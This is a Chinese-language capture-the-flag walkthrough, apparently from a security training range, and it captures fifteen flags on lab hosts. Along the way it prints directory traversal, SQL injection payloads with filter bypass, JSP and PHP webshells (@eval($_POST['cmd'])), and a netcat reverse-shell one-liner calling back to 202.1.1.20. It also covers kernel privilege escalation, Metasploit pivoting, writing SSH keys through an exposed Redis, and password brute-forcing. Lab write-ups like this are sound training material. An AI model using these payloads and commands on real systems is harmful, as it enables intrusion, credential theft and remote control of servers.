<p>进入用户管理，查看管理员用户，获得flag1;</p>
<div class="highlight-container" data-rel="Jsx"><figure class="iseeu highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag1&#123;498cc55df0c7a39c&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%205.png"
                      alt="Untitled"
                ></p>
<h3 id="2、flag2"><a href="#2、flag2" class="headerlink" title="2、flag2"></a>2、flag2</h3><p>在后台的模板资源管理功能下，可以列出指定目录下的文件，如果是指定后缀就可以进行编辑；在Firefox中按下f12查看其中的网络链接，选择了网络选项后，要重新刷新页面并点击到模板资源功能处，并随更换一下模板目录为static目录，单击static目录后，请求的url连接。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%206.png"
                      alt="Untitled"
                ></p>
<p>利用目录遍历漏洞，构造如下url；下图所示即为得到本机中web中间件的根目录中的文件，可以控制up_dir目录到不同的上层目录，如果再配合dir参数就能到达任意目录。</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[http://www.qianxin.com/admin/cms/template/getTemplates.html?res_path=res&amp;dir=&amp;up](http://www.qianxin.com/admin/cms/template/getTemplates.html?res_path=res&amp;dir=&amp;up)</span><br><span class="line">_dir=../../../../../../../../../../</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%207.png"
                      alt="Untitled"
                ></p>
<p>在tomcat-users.xml文件中，找到tomcat管理页面的账号和密码</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%208.png"
                      alt="Untitled"
                ></p>
<p>登录<a class="link"   target="_blank" rel="noopener" href="http://www.qianxin.com/manager/html" >http://www.qianxin.com/manager/html <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>，输入用户名密码，获取flag2；</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag2&#123;1595a7d9910930ca&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%209.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2010.png"
                      alt="Untitled"
                ></p>
<h3 id="3、flag3"><a href="#3、flag3" class="headerlink" title="3、flag3"></a>3、flag3</h3><p>将jspspy.jsp文件打包为.war并上传到tomcat管理页面；</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2011.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2012.png"
                      alt="Untitled"
                ></p>
<p>访问<a class="link"   target="_blank" rel="noopener" href="http://www.qianxin.com/spy/jspspy.jsp%EF%BC%8C%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81libai%EF%BC%9B%E8%BF%9B%E5%85%A5%E5%90%8E%E5%9C%A8c%E7%9B%98%E4%B8%AD%E8%8E%B7%E5%8F%96flag3%EF%BC%9B" >www.qianxin.com/spy/jspspy.jsp，输入密码libai；进入后在c盘中获取flag3； <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag3&#123;e0c34f72c42d6b90&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2013.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2014.png"
                      alt="Untitled"
                ></p>
<h3 id="4、flag4"><a href="#4、flag4" class="headerlink" title="4、flag4"></a>4、flag4</h3><p>使用wwwscan扫描news.qianxin.com，发现扫描结果中有sql目录，与题目相近，因此尝试访问；接着测试id&#x3D;2，可以发现，在id&#x3D;2中存在flag4，但是由于隐藏，看不到完整信息。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2015.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2016.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2017.png"
                      alt="Untitled"
                ></p>
<p>尝试sql注入payload，尝试如下：</p>
<table>
<thead>
<tr>
<th>尝试次数</th>
<th>使用的payload</th>
<th>尝试该payload的原因</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>?id&#x3D;1’</td>
<td>探测注入点</td>
</tr>
<tr>
<td>2</td>
<td>?id&#x3D;2 and 1&#x3D;1 –</td>
<td>闭合查询语句</td>
</tr>
<tr>
<td>3</td>
<td>?id&#x3D;2 order by 10 –</td>
<td>判断列数</td>
</tr>
<tr>
<td>4</td>
<td>?id&#x3D;2 order by 11 –</td>
<td>判断列数</td>
</tr>
<tr>
<td>5</td>
<td>index.php?id&#x3D;2%0Aununionion%0Aselselectect%0A1,2,use</td>
<td></td>
</tr>
<tr>
<td>r(),4,5,6,7,8,9,10–%0A—</td>
<td>尝试判断当前连接数据库的用户</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>index.php?id&#x3D;2%0Aununionion%0Aselselectect%0A1,2,gro</td>
<td></td>
</tr>
<tr>
<td>up_concat(column_name),4,5,6,7,8,9,10%0Afrom%0Ainformation_schema.columns%0Awher</td>
<td></td>
<td></td>
</tr>
<tr>
<td>e%0Atable_name&#x3D;%27dede_admin%27–%0A—</td>
<td>获取列名</td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>index.php?id&#x3D;2%0Aununionion%0Aselselectect%0A1,2,gro</td>
<td></td>
</tr>
<tr>
<td>up_concat(userid,pwd),4,5,6,7,8,9,10%0Afrom%0Adede_admin%0Awhere%0Aid&#x3D;2–%0A—</td>
<td>获取数据（flag）</td>
<td></td>
</tr>
</tbody></table>
<p>最后获取flag4</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag4&#123;c261a93b636d1975&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2018.png"
                      alt="Untitled"
                ></p>
<h3 id="5、flag5"><a href="#5、flag5" class="headerlink" title="5、flag5"></a>5、flag5</h3><p>通过flag4的任务获得admin的密码为：7cd6ef195a0f7622a9c5；在去掉前三位和最后一位后为6ef195a0f7622a9c，放入MD5Crack中进行破解；获得密码。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2019.png"
                      alt="Untitled"
                ></p>
<p>尝试访问<a class="link"   target="_blank" rel="noopener" href="http://news.qianxin.com/manager/login.php%EF%BC%8C" >http://news.qianxin.com/manager/login.php <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> ；用户名和密码分别为admin和1q2w3e4r ；进入后发现flag5</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag5&#123;b9719d911017c592&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2020.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2021.png"
                      alt="Untitled"
                ></p>
<h3 id="6、flag6"><a href="#6、flag6" class="headerlink" title="6、flag6"></a>6、flag6</h3><p>在进入<a class="link"   target="_blank" rel="noopener" href="http://news.qianxin.com/manager/login.php%EF%BC%8C" >http://news.qianxin.com/manager/login.php <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>后，进去【附件管理】模块中的【文件式管理器】模块，进入其中的data文件夹，点击编辑common.inc.php即可获取flag6；在获取flag6的同时还发现了db的用户名和密码。</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag6&#123;dd9e7b0c1a6227a2&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2022.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2023.png"
                      alt="Untitled"
                ></p>
<h3 id="7、flag7"><a href="#7、flag7" class="headerlink" title="7、flag7"></a>7、flag7</h3><p>构造一句话木马，并将其上传到uploads目录中；访问news.qianxin.com&#x2F;uploads&#x2F;shell.php</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2024.png"
                      alt="Untitled"
                ></p>
<p>进入kali，在终端中输入java -jar Cknife.jar命令打开Cknife，添加地址为news.qianxin.com&#x2F;uploads&#x2F;shell.php;然后右键进入虚拟终端；</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2025.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2026.png"
                      alt="Untitled"
                ></p>
<p>获取flag7</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag7&#123;4558894a57d3a6bc&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2027.png"
                      alt="Untitled"
                ></p>
<h3 id="8、flag8"><a href="#8、flag8" class="headerlink" title="8、flag8"></a>8、flag8</h3><p>登录blog.qianxin.com，发现其为wordpress站点；同时使用wpscan进行扫描漏洞，但是未发现。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2028.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2029.png"
                      alt="Untitled"
                ></p>
<p>使用wpscan -e参数 可以列举出一些信息，获得其用户名；然后对其密码进行暴力破解，得到密码为superman。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2030.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2031.png"
                      alt="Untitled"
                ></p>
<p>登录blog.qianxin.com&#x2F;wp-login.php，点击文章菜单，即可发现flag8</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag8&#123;8ebf5950de08089a&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2032.png"
                      alt="Untitled"
                ></p>
<h3 id="9、flag9"><a href="#9、flag9" class="headerlink" title="9、flag9"></a>9、flag9</h3><p><a class="link"   target="_blank" rel="noopener" href="http://在blog.qianxin.com/wp-login.php%E4%B8%AD%EF%BC%8C%E9%80%89%E6%8B%A9%E6%8F%92%E4%BB%B6Hello" >在blog.qianxin.com&#x2F;wp-login.php中，选择插件Hello <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> Dolly，并且增加一句话木马：@eval($_POST[‘cmd’]); 然后访问如下页面：<a class="link"   target="_blank" rel="noopener" href="http://blog.qianxin.com/wp-content/plugins/hello.php" >http://blog.qianxin.com/wp-content/plugins/hello.php <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2033.png"
                      alt="Untitled"
                ></p>
<p>在Cknife中添加<a class="link"   target="_blank" rel="noopener" href="http://blog.qianxin.com/wp-content/plugins/hello.php" >http://blog.qianxin.com/wp-content/plugins/hello.php <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2034.png"
                      alt="Untitled"
                ></p>
<p>双击打开后，在html目录下的wp-config.php文件中找到flag9，同时找到mysql数据库用户名和密码。</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag9&#123;9ced34482cf96ced&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2035.png"
                      alt="Untitled"
                ></p>
<h3 id="10、flag10"><a href="#10、flag10" class="headerlink" title="10、flag10"></a>10、flag10</h3><p>在获得数据库的用户名和密码之后，在Cknife中点击数据库管理，在数据库配置中将密码改为：wobugaosuni，由此获取全部数据库数据。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2036.png"
                      alt="Untitled"
                ></p>
<p>双击flag即可获得flag10</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag10&#123;409877992b99dec9&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2037.png"
                      alt="Untitled"
                ></p>
<h3 id="11、flag11"><a href="#11、flag11" class="headerlink" title="11、flag11"></a>11、flag11</h3><p>点击Cknife中的模拟终端，输入ls&#x2F;root获得root目录下的所有文件；由于当前webshell是www-data权限，所以并不能读取&#x2F;root目录下的文件内容。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2038.png"
                      alt="Untitled"
                ></p>
<p>使用uname -a命令查看操作系统信息，得到对方服务器是ubuntu系统，3.12.0-24内核，cpu架构i686，再使用lsb_releasea命令查看服务器的发行版型号。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2039.png"
                      alt="Untitled"
                ></p>
<p>利用kali自带的searchsploit搜索exploitdb中的漏洞利用代码；从结果中可以得到一个用于提权的exp。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2040.png"
                      alt="Untitled"
                ></p>
<p>将其下载下来并查看其使用方法。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2041.png"
                      alt="Untitled"
                ></p>
<p>将其上传到blog.qianxin.com服务器上；同时记录本机Ip地址为：202.1.1.20</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2042.png"
                      alt="Untitled"
                ></p>
<p>新建一个shell.sh文件，将rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|nc 202.1.1.20 2222&gt;&#x2F;tmp&#x2F;f写入，并上传到服务器上。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2043.png"
                      alt="Untitled"
                ></p>
<p>将shell.sh写入并执行，同时在监听窗口中发现，反弹shell成功，同时进入&#x2F;var&#x2F;www&#x2F;html&#x2F;wp-content&#x2F;plugins目录下。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2044.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2045.png"
                      alt="Untitled"
                ></p>
<p>执行gcc 37292.c；然后执行.&#x2F;a.out，变为root权限。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2046.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2047.png"
                      alt="Untitled"
                ></p>
<p>获取flag11；</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag11&#123;3d0482058402722f&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2048.png"
                      alt="Untitled"
                ></p>
<h3 id="12、flag12"><a href="#12、flag12" class="headerlink" title="12、flag12"></a>12、flag12</h3><p>使用msfvenom生成后门，然后在Kali终端中启动msf控制台，并监听模块载入payload，执行如下命令。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2049.png"
                      alt="Untitled"
                ></p>
<p>将其上传到服务器上。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2050.png"
                      alt="Untitled"
                ></p>
<p>对msf.elf增加可执行权限后执行，查看之前终端中监听的会话，已经成功拿到meterpreter会话。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2051.png"
                      alt="Untitled"
                ></p>
<p>查看ip地址后增加路由</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2052.png"
                      alt="Untitled"
                ></p>
<p>和之前添加路由的命令一样，添加192.168.100.0&#x2F;24网段的路由，输入run autoroute -s 192.168.100.0&#x2F;24，将rhosts换成192.168.100.0&#x2F;24后输入run开始执行，然后获得flag12。</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag12&#123;192.168.100.101&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2053.png"
                      alt="Untitled"
                ></p>
<h3 id="13、flag13"><a href="#13、flag13" class="headerlink" title="13、flag13"></a>13、flag13</h3><p>监听所有ip的1080端口</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2054.png"
                      alt="Untitled"
                ></p>
<p>新建终端，输入vim &#x2F;etc&#x2F;proxychains.conf，输入socks4 127.0.0.1 1080并注释掉原有的socks4。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2055.png"
                      alt="Untitled"
                ></p>
<p>以在终端中输入proxychains redis_cli -h 192.168.100.101进行连接，验证是否存在redis未授权访问漏洞。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2056.png"
                      alt="Untitled"
                ></p>
<p>输入info命令来查看信息，从中可以看到redis所使用的配置文件，因此获得flag13</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag13&#123;/etc/redis/redis.conf&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2057.png"
                      alt="Untitled"
                ></p>
<h3 id="14、flag14"><a href="#14、flag14" class="headerlink" title="14、flag14"></a>14、flag14</h3><p>在自己的电脑上生成key，新建一个终端输入ssh-keygen -t rsa</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2058.png"
                      alt="Untitled"
                ></p>
<p>将公钥导入key.txt文件，再把key.txt文件内容写入目标主机的缓冲里。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2059.png"
                      alt="Untitled"
                ></p>
<p>在终端中输入如下命令 cat &#x2F;root&#x2F;key.txt | proxychains redis-cli -h 192.168.100.101 -x set xxx</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2060.png"
                      alt="Untitled"
                ></p>
<p>设置redis的备份路径为&#x2F;root&#x2F;.ssh和保存文件名authorized_keys</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2061.png"
                      alt="Untitled"
                ></p>
<p>远程ssh连接成功，进入root文件夹后，获得flag14。</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag14&#123;24e3f47dead05ce8&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2062.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2063.png"
                      alt="Untitled"
                ></p>
<h3 id="15、flag15"><a href="#15、flag15" class="headerlink" title="15、flag15"></a>15、flag15</h3><p>获取oa-web的ip地址为：192.168.100.100</p>
<p>将tunnel.php和tunnel.nosocket.php倒入到服务器中并访问。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2064.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2065.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2066.png"
                      alt="Untitled"
                ></p>
<p>建立隧道</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2067.png"
                      alt="Untitled"
                ></p>
<p>在设置burpsuite和firefox设置后，可以正常登录oa系统</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2068.png"
                      alt="Untitled"
                ></p>
<p>输入账号admin，密码123456后使用Burpsuite抓包，传到intruder中，并为password打上标签，然后添加payload，开始爆破。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2069.png"
                      alt="Untitled"
                ></p>
<p>爆破完成后发现777777的长度与别人不同，因此尝试admin&#x2F;777777,发现密码正确，因此获得flag15.</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag15&#123;777777&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
